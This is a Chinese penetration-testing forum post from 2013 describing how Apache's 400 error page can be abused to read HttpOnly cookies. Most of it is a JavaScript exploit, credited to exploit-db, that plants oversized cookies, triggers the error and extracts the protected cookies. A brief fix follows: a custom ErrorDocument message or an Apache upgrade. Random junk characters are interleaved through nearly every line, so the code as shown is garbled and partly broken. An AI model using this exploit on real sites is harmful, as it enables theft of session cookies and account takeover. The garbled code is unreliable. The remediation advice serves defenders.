中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]

作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
  x8 ~+ V/ \) `
0 I' v9 j; N" k用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
* @! q# A( {* n5 A8 A7 V # N: b: j) H7 s8 ~/ R

: m1 j5 Y" ?& k) p* B6 `5 {* A// http://www.exploit-db.com/exploits/18442/1 h/ o" s( I' E' C' J" \6 O
function setCookies (good) {" M* {. }, v  s8 R
// Construct string for cookie value- ~; l$ I, Q" X6 _4 x" F
var str = "";
: ?% N; t" o8 w) |' W/ Bfor (var i=0; i< 819; i++) {' U9 A5 U; v7 B: H3 @# b
str += "x";; q; ], v# I: d
}/ K, J+ G$ V. U# t# c
// Set cookies6 j- [$ y2 f! w+ L! j1 U
for (i = 0; i < 10; i++) {
9 c; n2 n8 Y1 ?* {& ~' s+ l8 ^7 P// Expire evil cookie0 Y/ z+ R- m& A6 V
if (good) {
: _' n* P, t; m# v& W) Ovar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
  N- m0 q3 |! D, U}
! W5 d6 c  W) Y" L% m// Set evil cookie
8 R5 a' e0 R1 j# @, relse {
9 b7 C  s! u- v/ A4 T' {var cookie = "xss"+i+"="+str+";path=/";7 l$ b8 Q$ S3 l1 M
}) p, @: h; {8 s8 r: \% b+ _, d/ W
document.cookie = cookie;" G' m% l' f3 o+ g
}
9 }& H& p) O( b* W# Z5 o( I. O}
3 P$ n0 D, H0 ]; L) Bfunction makeRequest() {, K: A$ e- Y$ R" Y+ o4 w& Z
setCookies();
0 s. P: ~% E% R1 l, U6 F8 z/ N9 {function parseCookies () {2 e8 J) E  J" R; P  r
var cookie_dict = {};+ A, C  N, G, ?+ }8 p7 F
// Only react on 400 status
0 x* P/ Z& q# Z2 |! ]! w: A2 \if (xhr.readyState === 4 && xhr.status === 400) {; m; G5 g5 o; ]) @- t8 Y$ n
// Replace newlines and match <pre> content& m- J/ H( h7 j6 c$ U1 P
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);% Q0 Z* L9 U1 Z4 f: p' N  Z
if (content.length) {, R% s: f- ?, B4 O
// Remove Cookie: prefix
( I# ?! h) F8 Q, m$ s3 M) vcontent = content[1].replace("Cookie: ", "");( K* J7 f7 M8 I3 m  [- T
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
$ u" i# D, L) a. ?( P8 P! |: H// Add cookies to object  w2 s* y6 d9 I( k8 u5 `6 ]! b; q  s
for (var i=0; i<cookies.length; i++) {) V2 u4 B/ n: i6 b/ F
var s_c = cookies.split('=',2);
. n% }# C5 V* E% [! s5 m9 f5 gcookie_dict[s_c[0]] = s_c[1];
: p$ x3 C+ c% m/ p& R+ w  v( H1 ~  ~}
& R( D( ^$ U, x; w}' n# V, q0 e- {, D* ]
// Unset malicious cookies/ q: S/ g8 B: C' Y' D
setCookies(true);) ^6 E* x4 _- U$ A' j3 @
alert(JSON.stringify(cookie_dict));
8 D6 d# m0 I( o: G' U8 {}
" G3 H: Q2 X/ A}
: @9 J1 C/ U  p5 x6 P// Make XHR request5 \/ ]: B7 T% J2 v0 g+ X
var xhr = new XMLHttpRequest();
; E7 b9 y) S0 S! K% {xhr.onreadystatechange = parseCookies;
; E% |, z9 w+ ~) e0 V% c+ Z9 Z5 uxhr.open("GET", "/", true);9 x9 Z9 ~3 s  I
xhr.send(null);: M( f  }+ H& t; T: J! _, \
}, R6 [& w  X) H& x* ?
makeRequest();
3 L8 o* ?/ R/ P
/ i' O( y6 @1 H% I& U你就能看见华丽丽的400错误包含着cookie信息。! G: D! {. [; n
3 R6 r4 K9 |3 g
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#& T1 \. Q4 _1 ~' y1 G: b
5 i* k6 u1 w( P( _* L7 n  a
修复方案:" M7 e/ M# y% m' f/ M1 }! w3 C

1 P% W- b; C. |' PApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下1 O' z8 U% [& P
$ h. s' [$ ]/ k
In the event of a problem or error, Apachecan be configured to do one of four things,; P7 p! {1 Z; @1 v9 [1 C5 j

' k+ o# U* R/ L. a$ Z1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
  W, X2 w  m2 N% y* C( A& z" l- u2. output acustomized message输出一段信息
) D- q( m  v: T' r2 q3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 . s. s( r4 t$ t/ w7 j/ z/ X
4. redirect to an external URL to handle theproblem/error转向一个外部URL; O# x0 u" @4 f5 \; n$ D9 A

% u% F# w* \- ?7 A经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
; w1 I# h0 O, V! L, g5 c* v' V: Z
Apache配置:0 g( w' X# C6 ]# O/ g; ^8 X

: o* j% k- z. d; fErrorDocument400 " security test"/ @8 X7 a, c4 ~& p# E

7 G3 s. J  B9 K- Z2 V9 H当然,升级apache到最新也可:)。6 C( `3 A( y# j- S- w* R2 Z9 G

2 I2 T" f) a7 ]8 O参考:http://httpd.apache.org/security/vulnerabilities_22.html/ u7 T7 E+ h/ ?) }0 J9 M" x0 E2 `; i

/ T0 S! t! v2 l2 c. V: S




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2